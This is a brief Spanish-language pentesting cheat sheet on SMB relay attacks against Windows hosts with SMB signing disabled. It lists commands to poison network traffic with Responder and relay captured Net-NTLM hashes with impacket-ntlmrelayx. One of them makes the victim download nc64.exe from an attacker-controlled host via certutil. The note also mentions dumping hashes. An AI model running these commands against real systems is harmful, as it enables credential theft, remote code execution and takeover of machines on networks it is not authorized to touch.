SMB Relay

SMB Signing -> False

Descripción

Este ataque consiste en capturar los hashes Net-NTLM de un cliente, reenviarlos a un segundo cliente, permitiendonos actuar como si fuesemos el primer cliente. Debido a que el primer cliente es un usuario administrador, podremos ejecutar comandos o ganar una shell en el segundo cliente.

Para poder hacer el relaying el cliente del que capturemos los hashes Net-NTLM deberá pertenecer al grupo local de administradores sobre el cual vamos a querer ejecutar comandos y que el SMB signing esté desactivado.

/usr/share/responder/Responder.Conf:

Explotación

Envenenar el tráfico con responder:

python Responder.py -I eth0 -dw 

Empezar el ataque con ntlmrelayx

# con elbinario de impacket que viene en kali
impacket-ntlmrelayx -t (ip-target) -smb2support # el -smb2support es para versiones posteriores a WindowsServer 2008
impacket-ntlmrelayx -t 192.168.0.110 -smb2support
impacket-ntlmrelayx -tf targets.txt -smb2support

# ejecutar comandos
impacket-ntlmrelayx -t 192.168.0.110 -c "certutil.exe -f -urlcache -split http://192.168.0.108:9090/nc64.exe C:\\Windows\\Temp\\nc.exe" -smb2support

Cliente 1 con privilegios de administrador en el cliente 2:

Hashes dumpeados con ntlmrelayx